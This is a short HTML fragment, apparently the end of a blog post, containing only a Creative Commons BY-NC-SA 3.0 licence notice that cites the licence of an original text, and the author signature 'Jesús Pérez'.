<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-family: Trebuchet, 'Trebuchet MS', Arial, sans-serif; line-height: 20px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Note: This post is licensed under</span></span></span><span class="Apple-style-span" style="color: #333333;"><a href="http://creativecommons.org/licenses/by-nc-sa/3.0/" style="color: #666666; text-decoration: none;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></a><a href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Attribution-Noncommercial-Share Alike 3.0 Unported</span></span></a></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> to respect the license of the original text.</span></span></span></span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div>
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div>
<div style="text-align: right;">
<span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></span></div>